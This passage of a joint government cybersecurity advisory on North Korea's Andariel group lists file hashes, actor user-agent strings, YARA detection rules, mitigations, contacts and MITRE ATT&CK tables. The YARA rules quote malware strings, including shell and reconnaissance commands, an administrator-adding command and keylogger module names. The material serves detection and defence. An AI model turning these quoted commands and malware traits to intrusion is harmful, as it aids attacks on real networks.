c28bb61de4a6ad1c5e225ad9ec2eaf4a6c8ccfff40cf45a640499c0adb0d8740 34d5a5d8bec893519f204b573c33d54537b093c52df01b3d8c518af08ee94947 664f8d19af3400a325998b332343a9304f03bab9738ddab1530869eff13dae54 772b06f34facf6a2ce351b8679ff957cf601ef3ad29645935cb050b4184c8d51 aa29bf4292b68d197f4d8ca026b97ec7785796edcb644db625a8f8b66733ab54 9a5504dcfb7e664259bfa58c46cfd33e554225daf1cedea2ec2a9d83bbbfe238 c2500a6e12f22b16e221ba01952b69c92278cd05632283d8b84c55c916efe27c 8aa6612c95c7cef49709596da43a0f8354f14d8c08128c4cb9b1f37e548f083b 38f0f2d658e09c57fc78698482f2f638843eb53412d860fb3a99bb6f51025b07 The following include a list of user agent strings used by the actors: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0 Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Detection Methods See Table 2 for YARA rules, created by the FBI, authoring partners, and private industry, that can be used to detect malware used by the actors. Table 2. YARA Rules rule Andariel_ScheduledTask_Loader{    strings:        $obfuscation1 = { B8 02 00 00 00 48 6B C0 00 B9 CD FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 01 B9 CC FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 02 B9 8D FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 03 B9 9A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 04 B9 8C FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 05 B9 8A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 06 33 C9 66 89 8C 04 60 01 00 00 }                             $obfuscation2 = { 48 6B C0 02 C6 44 04 20 BA B8 01 00 00 00 48 6B C0 03 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 04 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 05 C6 44 04 20 8A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 9C B8 01 00 00 00 }                             $obfuscation3 = { 48 6B C0 00 C6 44 04 20 A8 B8 01 00 00 00 48 6B C0 01 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 02 C6 44 04 20 93 B8 01 00 00 00 48 6B C0 03 C6 44 04 20 96 B8 01 00 00 00 48 6B C0 04 C6 44 04 20 B9 B8 01 00 00 00 48 6B C0 05 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 07 C6 44 04 20 9E B8 01 00 00 00 48 6B C0 08 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 09 C6 44 04 20 8D B8 01 00 00 00 48 6B C0 0A C6 44 04 20 BC B8 01 00 00 00 }    condition:        uint16(0) == 0x5A4D and $obfuscation1 and $obfuscation2 and $obfuscation3} rule Andariel_KaosRAT_Yamabot{    strings:        $str1 = “/kaos/”        $str2 = “Abstand [”        $str3 = “] anwenden”        $str4 = “cmVjYXB0Y2hh”        $str5 = “/bin/sh”        $str6 = “utilities.CIpaddress”        $str7 = “engine.NewEgg”        $str8 = “%s%04x%s%s%s”        $str9 = “Y2FwdGNoYV9zZXNzaW9u”        $str10 = “utilities.EierKochen”        $str11 = “kandidatKaufhaus”    condition:        3 of them} rule TriFaux_EasyRAT_JUPITER{    strings:        $InitOnce = “InitOnceExecuteOnce”        $BREAK = { 0D 00 0A 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 0D 00 0A }                             $Bytes = “4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00,” wide    condition:        uint16(0) == 0x5a4d and all of them} rule Andariel_CutieDrop_MagicRAT{              strings:                             $config_os_w = “os/windows” ascii wide                             $config_os_l = “os/linux” ascii wide                             $config_os_m = “os/mac” ascii wide                             $config_comp_msft = “company/microsoft” ascii wide                             $config_comp_orcl = “company/oracle” ascii wide                             $POST_field_1 = “session=” ascii wide                             $POST_field_2 = “type=” ascii wide                             $POST_field_3 = “id=” ascii wide                             $command_misspelled = “renmae” ascii wide              condition:                             uint16(0) == 0x5a4d and 7 of them rule Andariel_hhsd_FileTransferTool{    strings:        // 30 4D C7                xor     [rbp+buffer_v41+3], cl        // 81 7D C4 22 C0 78 00    cmp      dword ptr [rbp+buffer_v41], 78C022h        // 44 88 83 00 01 00 00    mov      [rbx+100h], r8b        $handshake = { 30 ?? ?? 81 7? ?? 22 C0 78 00 4? 88 }                // B1 14                   mov     cl, 14h        // C7 45 F7 14 00 41 00    mov      [rbp+57h+Src], 410014h        // C7 45 FB 7A 00 7F 00    mov      [rbp+57h+var_5C], 7F007Ah        // C7 45 FF 7B 00 63 00    mov     [rbp+57h+var_58], 63007Bh        // C7 45 03 7A 00 34 00    mov      [rbp+57h+var_54], 34007Ah        // C7 45 07 51 00 66 00    mov      [rbp+57h+var_50], 660051h        // C7 45 0B 66 00 7B 00    mov      [rbp+57h+var_4C], 7B0066h        // C7 45 0F 66 00 00 00    mov      [rbp+57h+var_48], 66h ; ‘f’        $err_xor_str = { 14 C7 [2] 14 00 41 00 C7 [2] 7A 00 7F 00 C7 [2] 7B 00 63 00 C7 [2] 7A 00 34 00 }                // 41 02 D0                add     dl, r8b        // 44 02 DA                add     r11b, dl        // 3C 1F                   cmp     al, 1Fh        $buf_add_cmp_1f = { 4? 02 ?? 4? 02 ?? 3? 1F }         // B9 8D 10 B7 F8          mov     ecx, 0F8B7108Dh        // E8 F1 BA FF FF          call    sub_140001280        $hash_call_loadlib = { B? 8D 10 B7 F8 E8 }        $hash_call_unk = { B? 91 B8 F6 88 E8 }            condition:        uint16(0) == 0x5a4d and        (any of ($handshake, $err_xor_str, $buf_add_cmp_1f) and any of ($hash_call_*)) or        2 of ($handshake, $err_xor_str, $buf_add_cmp_1f) rule Andariel_Atharvan_3RAT{strings:$3RAT = “D:\\rang\\TOOL\\3RAT” $atharvan = “Atharvan_dll.pdb”condition:uint16(0) == 0x5a4d and any of them} rule Andariel_LilithRAT_Variant{    strings:        // The following are strings seen in the open source version of Lilith        $lilith_1 = “Initiate a CMD session first.” ascii wide        $lilith_2 = “CMD is not open” ascii wide        $lilith_3 = “Couldn’t write command” ascii wide        $lilith_4 = “Couldn’t write to CMD: CMD not open” ascii wide        // The following are strings that appear to be unique to the Unnamed Trojan based on Lilith        $unique_1 = “Upload Error!” ascii wide        $unique_2 = “ERROR: Downloading is already running!” ascii wide        $unique_3 = “ERROR: Unable to open file:” ascii wide        $unique_4 = “General error” ascii wide        $unique_5 = “CMD error” ascii wide        $unique_6 = “killing self” ascii wide    condition:        uint16(0) == 0x5a4d and filesize < 150KB and all of ($lilith_*) and 2 of ($unique_*)} rule Andariel_SocksTroy_Strings_OpCodes{       strings:        $strHost = “-host” wide        $strAuth = “-auth” wide        $SocksTroy = “SocksTroy”         $cOpCodeCheck = { 81 E? A0 00 00 00 0F 84 ?? ?? ?? ?? 83 E? 03 74 ?? 83 E? 02 74 ?? 83 F? 0B }    condition:        uint16(0) == 0x5a4d and        ((1 of ($str*)) and         (all of ($c*)) or (all of ($Socks*)))} rule Andariel_Agni{    strings:        $xor = { 34 ?? 88 01 48 8D 49 01 0F B6 01 84 C0 75 F1 }        $stackstrings = {C7 44 24 [5-10] C7 44 24 [5] C7 44 24 [5-10] C7 44 24 [5-10] C7 44 24}    condition:        uint16(0) == 0x5a4d and (#xor > 100 and #stackstrings > 5)} rule Andariel_GoLang_validalpha_handshake{    strings:        $ = { 66 C7 00 AB CD C6 40 02 EF ?? 03 00 00 00 48 89 C1 ?? 03 00 00 00 }    condition:        all of them} rule Andariel_GoLang_validalpha_tasks{    strings:        $ = “main.ScreenMonitThread”        $ = “main.CmdShell”        $ = “main.GetAllFoldersAndFiles”        $ = “main.SelfDelete”    condition:        all of them} rule Andariel_GoLang_validalpha_BlackString{    strings:    $ = “I:/01___Tools/02__RAT/Black”    condition:    uint16(0) == 0x5A4D and all of them} rule INDICATOR_EXE_Packed_VMProtect {        strings:        $s1 = “.vmp0” fullword ascii        $s2 = “.vmp1” fullword ascii    condition:        uint16(0) == 0x5a4d and all of them or        for any i in (0 .. pe.number_of_sections) : (            (                pe.sections[i].name == “.vmp0” or                pe.sections[i].name == “.vmp1”            )        )} rule INDICATOR_EXE_Packed_Themida {        strings:        $s1 = “.themida” fullword ascii    condition:        uint16(0) == 0x5a4d and all of them or        for any i in (0 .. pe.number_of_sections) : (            (                pe.sections[i].name == “.themida”            )        )} rule Andariel_elf_backdoor_fipps{strings:        $a = “found mac address”        $b = “RecvThread”        $c = “OpenSSL-1.0.0-fipps”        $d = “Disconnected!”    condition:        (all of them) and uint32(0) == 0x464c457f} rule Andariel_bindshell{strings: $str_comspec = “COMSPEC” $str_consolewindow = “GetConsoleWindow” $str_ShowWindow = “ShowWindow” $str_WSASocketA = “WSASocketA” $str_CreateProcessA = “CreateProcessA” $str_port = {B9 4D 05 00 00 89}condition:uint16(0) == 0x5A4D and all of them} rule Andariel_grease2{strings: $str_rdpconf = “c: \\windows\\temp\\RDPConf.exe” fullword nocase $str_rdpwinst = “c: \\windows\\temp\\RDPWInst.exe” fullword nocase $str_net_user = “net user” $str_admins_add = “net localgroup administrators”condition:uint16(0) == 0x5A4D andall of them} rule Andariel_NoPineapple_Dtrack_unpacked{strings: $str_nopineapple = “< No Pineapple! >” $str_qt_library = “Qt 5.12.10” $str_xor = {8B 10 83 F6 ?? 83 FA 01 77}condition:uint16(0) == 0x5A4D andall of them} rule Andariel_dtrack_unpacked{strings: $str_mutex = “MTX_Global” $str_cmd_1 = “/c net use \\\\” wide $str_cmd_2 = “/c ping -n 3 127.0.01 > NUL % echo EEE > \”%s\”” wide $str_cmd_3 = “/c move /y %s \\\\” wide $str_cmd_4 = “/c systeminfo > \”%s\” & tasklist > \”%s\” & netstat -naop tcp > \”%s\”” widecondition:uint16(0) == 0x5A4D andall of them} rule Andariel_TigerRAT_crowdsourced_rule {    strings:        $m1 = “.?AVModuleKeyLogger@@” fullword ascii        $m2 = “.?AVModulePortForwarder@@” fullword ascii        $m3 = “.?AVModuleScreenCapture@@” fullword ascii        $m4 = “.?AVModuleShell@@” fullword ascii        $s1 = “\\x9891-009942-xnopcopie.dat” fullword wide        $s2 = “(%02d : %02d-%02d %02d:%02d:%02d)— %s[Clipboard]” fullword ascii        $s3 = “[%02d : %02d-%02d %02d:%02d:%02d]— %s[Title]” fullword ascii        $s4 = “del \”%s\”%s \”%s\” goto ” ascii        $s5 = “[<<]” fullword ascii    condition:        uint16(0) == 0x5a4d and (all of ($s*) or (all of ($m*) and 1 of ($s*)) or (2 of ($m*) and 2 of ($s*)))} rule win_tiger_rat_auto {    strings:        $sequence_0 = { 33c0 89442438 89442430 448bcf 4533c0 }            // n = 5, score = 200            //   33c0                 | jmp                 5            //   89442438             | dec                 eax            //   89442430             | mov                 eax, ecx            //   448bcf               | movzx               eax, byte ptr [eax]            //   4533c0               | dec                 eax        $sequence_1 = { 41b901000000 488bd6 488bcb e8???????? }            // n = 4, score = 200            //   41b901000000         | dec                 eax            //   488bd6                | mov                 eax, dword ptr [ecx]            //   488bcb               | jmp                 8            //   e8????????           |                             $sequence_2 = { 4881ec90050000 8b01 8985c8040000 8b4104 }            // n = 4, score = 200            //   4881ec90050000       | test                eax, eax            //   8b01                 | jns                 0x16            //   8985c8040000         | dec                 eax            //   8b4104               | mov                 eax, dword ptr [ecx]        $sequence_3 = { 488b01 ff10 488b4f08 4c8d4c2430 }            // n = 4, score = 200            //   488b01               | mov                 edx, esi            //   ff10                 | dec                 eax            //   488b4f08             | mov                 ecx, ebx            //   4c8d4c2430           | inc                 ecx        $sequence_4 = { 488b01 ff10 488b4e18 488b01 }            // n = 4, score = 200            //   488b01               | dec                 eax            //   ff10                 | cmp                 dword ptr [ecx + 0x18], 0x10            //   488b4e18             | dec                 eax            //   488b01               | sub                 esp, 0x590        $sequence_5 = { 4881eca0000000 33c0 488bd9 488d4c2432 }            // n = 4, score = 200            //   4881eca0000000       | mov                 eax, dword ptr [ecx]            //   33c0                 | mov                 dword ptr [ebp + 0x4c8], eax            //   488bd9               | mov                 eax, dword ptr [ecx + 4]            //   488d4c2432           | mov                 dword ptr [ebp + 0x4d0], eax        $sequence_6 = { 488b01 eb03 488bc1 0fb600 }            // n = 4, score = 200            //   488b01               | inc                 ecx            //   eb03                 | mov                 ebx, dword ptr [ebp + ebp]            //   488bc1               | inc                 ecx            //   0fb600               | movups              xmmword ptr [edi], xmm0        $sequence_7 = { 488b01 8b10 895124 448b4124 4585c0 }            // n = 5, score = 200            //   488b01               | sub                 esp, 0x30            //   8b10                 | dec                 ecx            //   895124               | mov                 ebx, eax            //   448b4124             | dec                 eax            //   4585c0               | mov                 ecx, eax        $sequence_8 = { 4c8d0d31eb0000 c1e918 c1e808 41bf00000080 }            // n = 4, score = 100            //   4c8d0d31eb0000       | jne                 0x1e6            //   c1e918               | dec                 eax            //   c1e808               | lea                 ecx, [0xbda0]            //   41bf00000080         | dec                 esp        $sequence_9 = { 488bd8 4885c0 752d ff15???????? 83f857 0f85e0010000 488d0da0bd0000 }            // n = 7, score = 100            //   488bd8               | dec                 eax            //   4885c0               | mov                 ebx, eax            //   752d                 | dec                 eax            //   ff15????????         |                                 //   83f857               | test                eax, eax            //   0f85e0010000         | jne                 0x2f            //   488d0da0bd0000       | cmp                  eax, 0x57        $sequence_10 = { 75d4 488d1d7f6c0100 488b4bf8 4885c9 740b }            // n = 5, score = 100            //   75d4                 | lea                 ecx, [0xeb31]            //   488d1d7f6c0100       | shr                 ecx, 0x18            //   488b4bf8             | shr                 eax, 8            //   4885c9               | inc                 ecx            //   740b                 | mov                 edi, 0x80000000        $sequence_11 = { 0f85d9000000 488d15d0c90000 41b810200100 488bcd e8???????? eb6b b9f4ffffff }            // n = 7, score = 100            //   0f85d9000000         | jne                 0xffffffd6            //   488d15d0c90000       | dec                 eax            //   41b810200100         | lea                 ebx, [0x16c7f]            //   488bcd               | dec                 eax            //   e8????????           |                                 //   eb6b                 | mov                 ecx, dword ptr [ebx – 8]            //   b9f4ffffff           | dec                 eax        $sequence_12 = { 48890d???????? 488905???????? 488d05ae610000 488905???????? 488d05a0550000 488905???????? }            // n = 6, score = 100            //    48890d????????       |                                 //   488905????????       |                                 //   488d05ae610000       | test                ecx, ecx            //   488905????????       |                                 //   488d05a0550000       | je                  0x10            //   488905????????       |                             $sequence_13 = { 8bcf e8???????? 488b7c2448 85c0 0f8440030000 488d0560250100 }            // n = 6, score = 100            //   8bcf                  | mov                 eax, 0x12010            //   e8????????           |                                 //   488b7c2448           | dec                 eax            //   85c0                 | mov                 ecx, ebp            //   0f8440030000         | jmp                 0x83            //   488d0560250100       | mov                 ecx, 0xfffffff4        $sequence_14 = { ff15???????? 8b05???????? 2305???????? ba02000000 33c9 8905???????? 8b05???????? }            // n = 7, score = 100            //   ff15????????         |                                 //   8b05????????         |                                 //   2305????????         |                                 //   ba02000000           | dec                 eax            //   33c9                 | lea                 eax, [0x61ae]            //   8905????????         |                                 //   8b05????????         |                             $sequence_15 = { 4883ec30 498bd8 e8???????? 488bc8 4885c0 }            // n = 5, score = 100            //   4883ec30             | jne                 0xdf            //   498bd8               | dec                 eax            //   e8????????           |                                 //   488bc8               | lea                 edx, [0xc9d0]            //   4885c0               | inc                 ecx    condition:        7 of them and filesize < 557056} rule win_dtrack_auto {    strings:        $sequence_0 = { 52 8b4508 50 e8???????? 83c414 8b4d10 51 }            // n = 7, score = 400            //   52                   | push                edx            //   8b4508               | mov                 eax, dword ptr [ebp + 8]            //   50                   | push                eax            //   e8????????           |                                 //   83c414               | add                 esp, 0x14            //   8b4d10               | mov                 ecx, dword ptr [ebp + 0x10]            //   51                   | push                ecx        $sequence_1 = { 3a4101 7523 83854cf6ffff02 838550f6ffff02 80bd4af6ffff00 75ae c78544f6ffff00000000 }            // n = 7, score = 300            //   3a4101               | cmp                 al, byte ptr [ecx + 1]            //    7523                 | jne                 0x25            //   83854cf6ffff02       | add                 dword ptr [ebp – 0x9b4], 2            //   838550f6ffff02       | add                 dword ptr [ebp – 0x9b0], 2            //   80bd4af6ffff00       | cmp                 byte ptr [ebp – 0x9b6], 0            //   75ae                 | jne                 0xffffffb0            //   c78544f6ffff00000000     | mov     dword ptr [ebp – 0x9bc], 0        $sequence_2 = { 50 ff15???????? a3???????? 68???????? e8???????? 83c404 50 }            // n = 7, score = 300            //   50                   | push                eax            //   ff15????????         |                                 //   a3????????           |                                 //   68????????           |                                 //   e8????????           |                                 //   83c404               | add                 esp, 4            //   50                   | push                eax        $sequence_3 = { 8d8dd4faffff 51 e8???????? 83c408 8b15???????? }            // n = 5, score = 300            //   8d8dd4faffff         | lea                 ecx, [ebp – 0x52c]            //   51                   | push                ecx            //   e8????????           |                                 //   83c408               | add                 esp, 8            //   8b15????????         |                             $sequence_4 = { 8855f5 6a5c 8b450c 50 e8???????? }            // n = 5, score = 300            //   8855f5               | mov                 byte ptr [ebp – 0xb], dl            //   6a5c                 | push                0x5c            //   8b450c               | mov                 eax, dword ptr [ebp + 0xc]            //   50                   | push                eax            //   e8????????           |                             $sequence_5 = { 51 e8???????? 83c410 8b558c 52 }            // n = 5, score = 300            //   51                   | push                ecx            //   e8????????           |                                 //   83c410               | add                 esp, 0x10            //   8b558c                | mov                 edx, dword ptr [ebp – 0x74]            //   52                   | push                edx        $sequence_6 = { 8b4d0c 51 68???????? 8d9560eaffff 52 e8???????? }            // n = 6, score = 300            //   8b4d0c               | mov                 ecx, dword ptr [ebp + 0xc]            //   51                   | push                ecx            //   68????????           |                                 //   8d9560eaffff         | lea                 edx, [ebp – 0x15a0]            //   52                   | push                edx            //   e8????????           |                             $sequence_7 = { 83c001 8945f4 837df420 7d2c 8b4df8 }            // n = 5, score = 300            //   83c001               | add                 eax, 1            //   8945f4               | mov                 dword ptr [ebp – 0xc], eax            //   837df420             | cmp                 dword ptr [ebp – 0xc], 0x20            //   7d2c                 | jge                 0x2e            //   8b4df8               | mov                 ecx, dword ptr [ebp – 8]        $sequence_8 = { 83c001 89856cf6ffff 8b8d70f6ffff 8a11 }            // n = 4, score = 300            //   83c001               | add                 eax, 1            //   89856cf6ffff         | mov                 dword ptr [ebp – 0x994], eax            //   8b8d70f6ffff         | mov                 ecx, dword ptr [ebp – 0x990]            //   8a11                 | mov                 dl, byte ptr [ecx]        $sequence_9 = { 0355f0 0fb602 0fb64df7 33c1 0fb655fc 33c2 }            // n = 6, score = 200            //   0355f0               | add                 edx, dword ptr [ebp – 0x10]            //   0fb602               | movzx               eax, byte ptr [edx]            //   0fb64df7             | movzx               ecx, byte ptr [ebp – 9]            //   33c1                 | xor                 eax, ecx            //    0fb655fc             | movzx               edx, byte ptr [ebp – 4]            //   33c2                 | xor                 eax, edx        $sequence_10 = { d1e9 894df8 8b5518 8955fc c745f000000000 }            // n = 5, score = 200            //   d1e9                 | shr                 ecx, 1            //   894df8               | mov                 dword ptr [ebp – 8], ecx            //   8b5518               | mov                 edx, dword ptr [ebp + 0x18]            //   8955fc               | mov                 dword ptr [ebp – 4], edx            //   c745f000000000       | mov                 dword ptr [ebp – 0x10], 0        $sequence_11 = { 8b4df0 3b4d10 0f8d90000000 8b5508 0355f0 0fb602 }            // n = 6, score = 200            //   8b4df0               | mov                 ecx, dword ptr [ebp – 0x10]            //   3b4d10               | cmp                 ecx, dword ptr [ebp + 0x10]            //   0f8d90000000         | jge                 0x96            //   8b5508               | mov                 edx, dword ptr [ebp + 8]            //   0355f0               | add                 edx, dword ptr [ebp – 0x10]            //   0fb602               | movzx               eax, byte ptr [edx]        $sequence_12 = { 894d14 8b45f8 c1e018 8b4dfc c1e908 0bc1 }            // n = 6, score = 200            //   894d14               | mov                 dword ptr [ebp + 0x14], ecx            //   8b45f8               | mov                 eax, dword ptr [ebp – 8]            //   c1e018               | shl                 eax, 0x18            //   8b4dfc               | mov                 ecx, dword ptr [ebp – 4]            //   c1e908               | shr                 ecx, 8            //   0bc1                 | or                  eax, ecx        $sequence_13 = { 0bc1 894518 8b5514 8955f8 }            // n = 4, score = 200            //   0bc1                 | or                  eax, ecx            //   894518               | mov                 dword ptr [ebp + 0x18], eax            //   8b5514               | mov                 edx, dword ptr [ebp + 0x14]            //   8955f8               | mov                 dword ptr [ebp – 8], edx        $sequence_14 = { 8b5514 8955f8 8b4518 8945fc e9???????? 8be5 }            // n = 6, score = 200            //   8b5514               | mov                 edx, dword ptr [ebp + 0x14]            //   8955f8               | mov                 dword ptr [ebp – 8], edx            //   8b4518               | mov                 eax, dword ptr [ebp + 0x18]            //   8945fc               | mov                 dword ptr [ebp – 4], eax            //   e9????????           |                                 //   8be5                 | mov                 esp, ebp    condition:        7 of them and filesize < 1736704} Mitigation Measures The authoring agencies recommend implementing the mitigations below to improve your organization’s cybersecurity posture based on the threat actors’ activity. Log4Shell and Other Log4j Vulnerabilities Defenders should consult the joint Cybersecurity Advisory titled “Mitigating Log4Shell and Other Log4j-Related Vulnerabilities” and CISA’s “Apache Log4j Vulnerability” guidance. Organizations can mitigate the risks posed by the vulnerability by identifying assets affected by Log4Shell and other Log4j-related vulnerabilities and upgrading Log4j assets and affected products to the latest version.  Note: CVE-2021-44228 ‘Log4Shell’ was disclosed in December 2021 and affects the Log4j library prior to version 2.17.0. Defenders should remain alert to vendor software updates, and initiate hunt and incident response procedures to detect possible Log4Shell exploitation. Web Shell Malware Web shell malware is deployed by adversaries on a victim’s web server to execute arbitrary system commands. The NSA and Australian Signals Directorate’s report titled “Detect and Prevent Web Shell Malware” provides mitigating actions to identify and recover from web shells. Preventing exploitation of web-facing servers often depends on maintaining an inventory of systems and applications, rapidly applying patches as they are released, putting vulnerable or potentially risky systems behind reverse proxies that require authentication, and deploying and configuring Web Application Firewalls (WAFs). Endpoint Activity Preventing and detecting further adversary activity should focus on deploying endpoint agents or other monitoring mechanisms, blocking unnecessary outbound connections, blocking external access to administrator panels and services or turning them off entirely, and segmenting the network to prevent lateral movement from a compromised web server to critical assets. Command Line Activity and Remote Access Monitoring for suspicious command-line activity, implementing multi-factor authentication for remote access services, and properly segmenting and using allow-listing tools for critical assets can protect against malicious activity by RGB 3rd Bureau’s Andariel group and other cyber threat actors. Packing Signatures for Themida, VMProtect and a number of other packers are available here, however, the signatures will not identify every file packed using these applications. Additional Mitigation Measures for Malicious Activities Check for security vulnerabilities, apply patches, and update to the latest version of software Encrypt all sensitive data including personal information Block access to unused ports Change passwords when they are suspected of being compromised Alert on unexpected use of dual-use applications Strengthen the subscriber identity authentication process for leased servers DPRK Rewards for Justice The U.S. and ROK Governments encourage victims to report suspicious activities, including those related to suspected DPRK cyber activities, to relevant authorities. If you provide information about illicit DPRK activities in cyberspace, including past or ongoing operations, you may be eligible for a reward. If you have information about illicit DPRK activities in cyberspace, including past or ongoing operations, providing such information through the Department of State’s Rewards for Justice program could make you eligible to receive an award of up to $10 million. For further details, please visit https://rewardsforjustice.net/. Acknowledgements Mandiant and Microsoft Threat Intelligence contributed to this CSA. Disclaimer of Endorsement Your organization has no obligation to respond or provide information in response to this product.  If, after reviewing the information provided, your organization decides to provide information to the authorizing agencies, it must do so consistent with applicable state and federal law. The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or service by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the co-authors. Version History July 25, 2024: Initial version. August 6, 2024: Updated “Credential Access” and “Commodity Malware and Dual-Use Applications” sections. Trademark Recognition Active Directory®, Microsoft®, PowerShell®, and Windows® are registered trademarks of Microsoft Corporation. MITRE® and ATT&CK® are registered trademarks of The MITRE Corporation. Purpose This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. Contact U.S. organizations: Urgently report any anomalous activity or incidents, including based upon technical information associated with this Cybersecurity Advisory, to CISA at Report@cisa.dhs.gov or cisa.gov/report or to the FBI via your local FBI field office listed at https://www.fbi.gov/contact-us/fieldoffices. DC3 Cyber Forensics Laboratory (CFL): afosi.dc3.cflintake@us.af.mil DoD-Defense Industrial Base (DIB) Collaborative Information Sharing Environment (DCISE): dc3.dcise@us.af.mil NSA Cybersecurity Report Questions and Feedback: CybersecurityReports@nsa.gov NSA Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov NSA Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov Republic of Korea organizations: If you suspect cyber incidents involving state actors, including Andariel, or discover similar cases, please contact the relevant authorities below. National Intelligence Service: www.nis.go.kr, +82 111 References AhnLab Security Emergency Response Center: https://asec.ahnlab.com/en/56405/ https://asec.ahnlab.com/en/59073/ https://asec.ahnlab.com/en/66088/ Boredhackerblog: http://www.boredhackerblog.info/2022/11/openssl-100-fipps-linux-backdoor-notes.html Cisco Talos Intelligence blogs: https://blog.talosintelligence.com/lazarus-three-rats/  https://blog.talosintelligence.com/lazarus-magicrat/ https://blog.talosintelligence.com/lazarus-collectionrat/ https://blog.talosintelligence.com/lazarus-quiterat/ DCSO blog: https://medium.com/@DCSO_CyTec/andariels-jupiter-malware-and-the-case-of-the-curious-c2-dbfe29f57499 Github.com/ditekshen: https://github.com/ditekshen/detection/blob/master/yara/indicator_packed.yar JPCERT blogs: https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html https://blogs.jpcert.or.jp/en/2022/07/yamabot.html Mandiant blogs: https://www.mandiant.com/resources/blog/north-korea-cyber-structure-alignment-2023 https://www.mandiant.com/resources/blog/mapping-dprk-groups-to-government Microsoft blogs: https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ https://www.microsoft.com/en-us/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/ NSCS Guidance: Alert: Apache Log4j Vulnerabilities: https://www.ncsc.gov.uk/news/apache-log4j-vulnerability Information: https://www.ncsc.gov.uk/information/log4j-vulnerability-what-everyone-needs-to-know Symantec blog: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research VMware blog: https://blogs.vmware.com/security/2021/12/tigerrat-advanced-adversaries-on-the-prowl.html WithSecure Labs report: https://labs.withsecure.com/publications/no-pineapple-dprk-targeting-of-medical-research-and-technology-sector Appendix: MITRE ATT&CK Techniques and Software The tactics and techniques referenced in this advisory are identified in Table 3 – Table 12. Table 3. Reconnaissance and Enumeration Technique Title ID Use Gather Victim Org Information T1591 The actors gather information about the victim’s organization that can be used during targeting. Gather Victim Host Information T1592 The actors gather information about the victim’s hosts that can be used during targeting. Active Scanning T1595 The actors execute active reconnaissance scans to gather information that can be used during targeting. Search Open Technical Databases T1596 The actors search freely available technical databases for information about victims that can be used during targeting. Table 4. Resource Development, Tooling, and Remote Access Tools (RATs) Technique Title ID Use OS Credential Dumping T1003 The actors attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Exfiltration Over Alternative Protocol T1048 The actors steal data by exfiltrating it over a different protocol than that of the existing command and control channel. Proxy T1090 The actors use a connection proxy to direct network traffic between systems or act as intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Archive Collected Data T1560 The actors compress and/or encrypt data that is collected prior to exfiltration. Protocol Tunneling T1572 The actors tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Develop Capabilities: Malware T1587.001 The actors develop malware and malware components that can be used during targeting. Develop Capabilities: Exploits T1587.004 The actors develop exploits that can be used during targeting. Table 5. Software used for Resource Development, Tooling, and RATs Software Title ID Use Mimikatz S0002 The actors use a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. AdFind S0552 The actors use a free command-line query tool that can be used for gathering information from the Active Directory. Table 6. Initial Access Technique Title ID Use Exploit Public-Facing Application T1190 The actors attempt to exploit a weakness in an Internet-facing host or system to initially access a network. Table 7. Execution Technique Title ID Use Command and Scripting Interpreter T1059 The 